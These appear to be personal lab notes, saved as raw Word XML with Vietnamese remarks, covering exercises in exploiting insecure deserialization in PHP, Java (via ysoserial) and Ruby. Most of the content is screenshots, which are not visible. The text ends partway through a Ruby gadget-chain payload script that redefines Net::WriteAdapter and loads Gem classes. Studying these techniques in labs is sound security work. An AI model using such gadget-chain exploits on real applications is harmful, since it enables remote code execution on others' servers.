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6C95" w14:textId="4E482031" w:rsidR="001E76F5" w:rsidRDefault="00EE537A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238087" w:history="1">
        <w:r w:rsidR="001E76F5" w:rsidRPr="00AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="001E76F5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1E76F5" w:rsidRPr="00AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Modifying serialized objects</w:t>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc215238087 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="001E76F5">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BDD68C4" w14:textId="059262CF" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238088" w:history="1">
        <w:r w:rsidRPr="00AC600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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Modifying serialized data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0922D6" w14:textId="062059DA" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238089" w:history="1">
        <w:r w:rsidRPr="00AC600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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Using application functionality to exploit insecure deserialization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8A3A7F" w14:textId="50E405CF" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238090" w:history="1">
        <w:r w:rsidRPr="00AC600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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Arbitrary object injection in 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F2C9F1" w14:textId="126F85B4" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238091" w:history="1">
        <w:r w:rsidRPr="00AC600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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploiting Java deserialization with Apache Commons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39F80C" w14:textId="698ED4E6" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238092" w:history="1">
        <w:r w:rsidRPr="00AC600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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploiting PHP deserialization with a pre-built gadget chain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EDAD00" w14:textId="05506373" w:rsidR="001E76F5" w:rsidRDefault="001E76F5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15238093" w:history="1">
        <w:r w:rsidRPr="00AC6008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AC6008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploiting Ruby deserialization using a documented gadget chain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_Toc215238093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1FABD4" w14:textId="2612C9E2" w:rsidR="00EE537A" w:rsidRDefault="00EE537A" w:rsidP="00B52F92">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD710F" w14:textId="5CB65CE1" w:rsidR="005847A0" w:rsidRDefault="00B52F92" w:rsidP="00B52F92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc215238087"/>
      <w:r w:rsidRPr="00B52F92">
        <w:t>Modifying serialized objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2523FAB3" w14:textId="6FCA5849" w:rsidR="00B52F92" w:rsidRDefault="00824B29" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00824B29">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A9E99F" wp14:editId="3A9E82A3">
            <wp:extent cx="5943600" cy="2299335"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1487794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9432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8705" w14:textId="50CCCCD9" w:rsidR="00824B29" w:rsidRDefault="00824B29" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00824B29">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BDB7AE5" wp14:editId="2576BBFE">
            <wp:extent cx="5943600" cy="1870075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199683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37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5848" w14:textId="50DC5378" w:rsidR="00824B29" w:rsidRDefault="00824B29" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00824B29">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F7AF730" wp14:editId="2DEE5446">
            <wp:extent cx="5943600" cy="1870710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="978885045" name="Picture 1" descr="A computer screen shot of a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85045" name="Picture 1" descr="A computer screen shot of a flag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5863" w14:textId="5286BC69" w:rsidR="00824B29" w:rsidRDefault="00824B29" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00824B29">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F6E968" wp14:editId="3983E8E3">
            <wp:extent cx="5943600" cy="3195320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1680860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6073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4B82" w14:textId="4D41A993" w:rsidR="00C84677" w:rsidRDefault="00C84677" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C84677">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B134D22" wp14:editId="30D4A768">
            <wp:extent cx="5943600" cy="3224530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1310802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0226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2720" w14:textId="6CAA1241" w:rsidR="00C84677" w:rsidRDefault="00C84677" w:rsidP="00824B29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C84677">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538B396E" wp14:editId="49479A9B">
            <wp:extent cx="5943600" cy="2108200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="744707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0771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9F78" w14:textId="4CF7C9ED" w:rsidR="00C84677" w:rsidRDefault="00112CAE" w:rsidP="00112CAE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc215238088"/>
      <w:r w:rsidRPr="00112CAE">
        <w:t>Modifying serialized data types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7CE75559" w14:textId="20B4C7A7" w:rsidR="00112CAE" w:rsidRDefault="00FD2095" w:rsidP="00112CAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD2095">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="525C13AE" wp14:editId="19873D59">
            <wp:extent cx="5943600" cy="2296795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1548089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8925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0F99" w14:textId="45F621F3" w:rsidR="00FD2095" w:rsidRDefault="00FD2095" w:rsidP="00112CAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD2095">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E815460" wp14:editId="56F6BA55">
            <wp:extent cx="5943600" cy="1515745"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="994015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1524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601B" w14:textId="32FF4338" w:rsidR="00FD2095" w:rsidRDefault="007F1C84" w:rsidP="00112CAE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F1C84">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C296C3" wp14:editId="494018BD">
            <wp:extent cx="5943600" cy="3161665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1764774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7407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1AA6" w14:textId="78EFB253" w:rsidR="007F1C84" w:rsidRDefault="007D155F" w:rsidP="007D155F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc215238089"/>
      <w:r w:rsidRPr="007D155F">
        <w:t>Using application functionality to exploit insecure deserialization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="71BA70A2" w14:textId="21D933F2" w:rsidR="007D155F" w:rsidRDefault="00623198" w:rsidP="00623198">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00623198">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24AA9099" wp14:editId="0B7B998F">
            <wp:extent cx="5943600" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1336571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7195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DC20" w14:textId="588014FC" w:rsidR="00623198" w:rsidRDefault="006B4622" w:rsidP="00623198">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006B4622">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B1E56F" wp14:editId="739BF0B3">
            <wp:extent cx="2819794" cy="4105848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1954874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7405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D709" w14:textId="25D3E085" w:rsidR="00D70291" w:rsidRDefault="006B4622" w:rsidP="00623198">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006B4622">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C590251" wp14:editId="020725E5">
            <wp:extent cx="5943600" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1079154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5479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6E4E" w14:textId="04071CCC" w:rsidR="00D70291" w:rsidRDefault="006B4622" w:rsidP="006B4622">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc215238090"/>
      <w:r w:rsidRPr="006B4622">
        <w:t>Arbitrary object injection in PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="233D431C" w14:textId="5FCC2829" w:rsidR="006B4622" w:rsidRDefault="00B83AB7" w:rsidP="00B83AB7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83AB7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="362D8F5A" wp14:editId="0CE13D1A">
            <wp:extent cx="5763429" cy="266737"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="114577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751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C497" w14:textId="734A0AFD" w:rsidR="00B83AB7" w:rsidRDefault="00B83AB7" w:rsidP="00B83AB7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83AB7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A947482" wp14:editId="158D3860">
            <wp:extent cx="5943600" cy="1990090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="224560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6085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1AFD" w14:textId="6C47D477" w:rsidR="00B83AB7" w:rsidRDefault="00B83AB7" w:rsidP="00B83AB7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83AB7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AAECAF9" wp14:editId="08631C17">
            <wp:extent cx="5943600" cy="3491230"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1396120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2033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6091" w14:textId="514A99E7" w:rsidR="00E94FF7" w:rsidRDefault="00E94FF7" w:rsidP="00B83AB7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94FF7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35FF16A6" wp14:editId="16DA47F3">
            <wp:extent cx="5943600" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="259586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8691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AB10" w14:textId="27C483F4" w:rsidR="00E94FF7" w:rsidRDefault="00E94FF7" w:rsidP="00B83AB7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E94FF7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3906E9E1" wp14:editId="4514AC9A">
            <wp:extent cx="5943600" cy="3519805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1294457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5746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57E0" w14:textId="114C8A2F" w:rsidR="00261714" w:rsidRDefault="00261714" w:rsidP="00261714">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc215238091"/>
      <w:r w:rsidRPr="00261714">
        <w:t>Exploiting Java deserialization with Apache Commons</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6CE0EE5E" w14:textId="1FE75ADF" w:rsidR="00261714" w:rsidRDefault="00785A41" w:rsidP="00261714">
      <w:r>
        <w:t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00785A41">
        <w:t>ysoserial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDAD2D" w14:textId="700EE563" w:rsidR="00785A41" w:rsidRDefault="00785A41" w:rsidP="00785A41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00785A41">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0682F7F6" wp14:editId="7C6B0CBF">
            <wp:extent cx="5943600" cy="2709545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="186757536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75364" name="Picture 1" descr="A screen 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39D2" w14:textId="3BC9C33C" w:rsidR="00785A41" w:rsidRDefault="005B1CC4" w:rsidP="00785A41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1CC4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46539C47" wp14:editId="253930E7">
            <wp:extent cx="5943600" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="468697823" name="Picture 1" descr="A white rectangular object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97823" name="Picture 1" descr="A white rectangular object with red and blue line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C7EB" w14:textId="1F12777F" w:rsidR="005B1CC4" w:rsidRDefault="005B1CC4" w:rsidP="00785A41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005B1CC4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227F163C" wp14:editId="28BA21EC">
            <wp:extent cx="5943600" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="102345324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53248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B2AC" w14:textId="0E3A79AE" w:rsidR="005B1CC4" w:rsidRDefault="003C7D59" w:rsidP="00785A41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003C7D59">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745AC1FA" wp14:editId="2E4C3597">
            <wp:extent cx="5943600" cy="2792730"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1144012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1257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2633" w14:textId="160DF8A3" w:rsidR="003C7D59" w:rsidRDefault="00D64E9B" w:rsidP="008974C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc215238092"/>
      <w:r w:rsidRPr="00D64E9B">
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting PHP deserialization with a pre-built gadget chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1EA0A1A6" w14:textId="644A1B03" w:rsidR="00D64E9B" w:rsidRDefault="00D64E9B" w:rsidP="00D64E9B">
      <w:r>
        <w:t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00D64E9B">
        <w:t>PHP Generic Gadget Chains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246804FB" w14:textId="4A76990D" w:rsidR="00D64E9B" w:rsidRDefault="00FC5B03" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC5B03">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42DA74AB" wp14:editId="61ED5DCD">
            <wp:extent cx="5943600" cy="2199005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1190639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3944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2DD0" w14:textId="53E1DCD1" w:rsidR="00FC5B03" w:rsidRDefault="00FC5B03" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC5B03">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE1313E" wp14:editId="1C2D49F4">
            <wp:extent cx="5943600" cy="1875790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="374112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1229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4656" w14:textId="24DABFA9" w:rsidR="00FC5B03" w:rsidRDefault="009223A7" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009223A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76F77F72" wp14:editId="0FE13C71">
            <wp:extent cx="3543795" cy="438211"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101615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583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0CAB" w14:textId="3C307F02" w:rsidR="009223A7" w:rsidRDefault="009223A7" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009223A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B853C61" wp14:editId="4CCAA422">
            <wp:extent cx="3277057" cy="857370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69871517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5179" name="Picture 1" descr="A screen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CFBE" w14:textId="3403D154" w:rsidR="009223A7" w:rsidRDefault="009223A7" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009223A7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="118251AB" wp14:editId="10D33A32">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13044576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57640" name="Picture 1" descr="A screen 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8ADF" w14:textId="51496405" w:rsidR="009223A7" w:rsidRDefault="009223A7" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009223A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078EF1C8" wp14:editId="7E43D241">
            <wp:extent cx="5943600" cy="1510665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93122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2827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C1F5" w14:textId="5BA3A2CE" w:rsidR="009223A7" w:rsidRDefault="009223A7" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009223A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA99BE4" wp14:editId="6CC7F0A8">
            <wp:extent cx="5943600" cy="626110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="82997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750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AE24" w14:textId="168CDE6A" w:rsidR="009223A7" w:rsidRDefault="00CD71DA" w:rsidP="00D64E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD71DA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353D50AA" wp14:editId="137D91C4">
            <wp:extent cx="5943600" cy="3517265"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="293786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8601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0BAB" w14:textId="563E7727" w:rsidR="00CD71DA" w:rsidRDefault="00A04FF3" w:rsidP="0035746B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc215238093"/>
      <w:r w:rsidRPr="00A04FF3">
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting Ruby deserialization using a documented gadget chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="587D111E" w14:textId="0CC1D80B" w:rsidR="00A04FF3" w:rsidRDefault="004B3757" w:rsidP="004B3757">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004B3757">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0389D9F1" wp14:editId="12809E85">
            <wp:extent cx="5943600" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="616140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40622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A668" w14:textId="38E69C59" w:rsidR="004B3757" w:rsidRDefault="004B3757" w:rsidP="004B3757">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004B3757">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0208CC97" wp14:editId="79D192D9">
            <wp:extent cx="5943600" cy="1230630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1240178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7892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08AE" w14:textId="5BB2F735" w:rsidR="004B3757" w:rsidRDefault="00403E9F" w:rsidP="004B3757">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tra </w:t>
      </w:r>
      <w:r w:rsidRPr="00403E9F">
        <w:t>ruby deserialization gadget chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D62324" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">require 'base64'  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0EDDF0" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t># THÊM DÒNG NÀY ĐỂ FIX LỖI "uninitialized constant Net"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765336D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>require 'net/http'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072C45F" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE4604E" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t># Định nghĩa lại WriteAdapter vì trong một số version Ruby mới nó không tự load hoặc đã thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F6A7A" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>class Net::WriteAdapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB49180" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">  def initialize(socket, method_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3ECAC4" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">    @socket = socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5B74A" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">    @method_id = method_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408575EA" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">  end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09585D" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">end  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FD722" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793CE3AD" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t># Autoload các class cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF76A1F" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t>Gem::SpecFetcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEEDEB" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00403E9F">
        <w:t xml:space="preserve">Gem::Installer  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA3539" w14:textId="77777777" w:rsidR="00403E9F" w:rsidRPr="00403E9F" w:rsidRDefault="00403E9F" w:rsidP="00403E9F">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
